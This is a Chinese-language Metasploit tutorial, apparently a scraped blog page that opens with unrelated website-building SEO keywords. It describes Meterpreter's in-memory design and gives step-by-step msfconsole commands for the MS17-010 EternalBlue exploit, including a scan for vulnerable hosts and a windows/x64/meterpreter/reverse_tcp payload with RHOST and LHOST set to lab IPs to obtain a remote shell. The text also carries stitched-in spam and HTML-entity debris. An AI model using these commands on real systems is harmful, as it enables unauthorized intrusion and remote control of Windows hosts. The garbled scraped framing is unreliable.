职友集 一家做公司点评的网站,台州营销型网站建设,国内企业手机网站建设,网站服务器建设的三种方法Meterpreter属于stage payload#xff0c;在Metasploit Framework中#xff0c;Meterpreter是一种后渗透工具#xff0c;它 属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注 入”理念实现的#xff0c;它能够通过创建一个新进…Meterpreter属于stage payload在Metasploit Framework中Meterpreter是一种后渗透工具它 属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注 入”理念实现的它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。
Meterpreter是如何工作的
首先目标先要执行初始的溢出漏洞会话连接可能是 bind正向连接或者反弹 reverse 连接。反射连接 的时候加载dll链接文件同时后台悄悄处理 dll 文件。其次Meterpreter核心代码初始化,通过 socket套 接字建立一个TLS/1.0加密隧道并发送GET请求给Metasploit服务端。Metasploit服务端收到这个GET请 求后就配置相应客户端。最后Meterpreter加载扩展所有的扩展被加载都通过TLS/1.0进行数据传输。
Meterpreter的特点
Meterpreter完全驻留在内存没有写入到磁盘
Meterpreter注入的时候不会产生新的进程并可以很容易的移植到其它正在运行的进程
默认情况下 Meterpreter的通信是加密的所以很安全
扩展性许多新的特征模块可以被加载。
我们在设置 payloads 时可以将 payloads 设置为windows/meterpreter/reverse_tcp 然后获得了 meterpreter 之后我们就可以干很多事了
MS17_010(永恒之蓝)
我们现在模拟使用 MS17_010 漏洞攻击这个漏洞就是去年危害全球的勒索病毒利用的永恒之蓝漏洞。 kali控制台输入msfconsole 进入metasploit框架 寻找MS17_010漏洞 search ms17_010 这里找到了两个模块第一个辅助模块是探测主机是否存在MS17_010漏洞第二个是漏洞利用模块 我们先探测哪些主机存在漏洞
辅助模块(探测模块
输入命令use auxiliary/scanner/smb/smb_ms17_010 查看这个模块需要配置的信息show options RHOSTS 参数是要探测主机的ip或ip范围我们探测一个ip范围内的主机是否存在漏洞 输入set RHOSTS ip地址
输入exploit 攻击这里有号的就是可能存在漏洞的主机
漏洞利用模块
然后我们就可以去利用漏洞攻击了选择漏洞攻击模块
use exploit/windows/smb/ms17_010_eternalblue
查看这个漏洞的信息info 查看可攻击的系统平台这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统show targets
这里只有一个有些其他的漏洞模块对操作系统的语言和版本要求的很严比如MS08_067这样就要 我们指定目标系统的版本的。如果不设置的话MSF会自动帮我们判断目标操作系统的版本和语言(利用 目标系统的指纹特征) 查看攻击载荷show payloads
设置攻击载荷set payload windows/x64/meterpreter/reverse_tcp
查看模块需要配置的参数 show options
设置RHOST也就是要攻击主机的ipset RHOST 192.168.125.138
设置LHOST也就是我们主机的ip用于接收从目标机弹回来的shellset LHOST 192.168.125.129
如果我们这里不设置lport的话默认是4444端口监听
攻击 exploit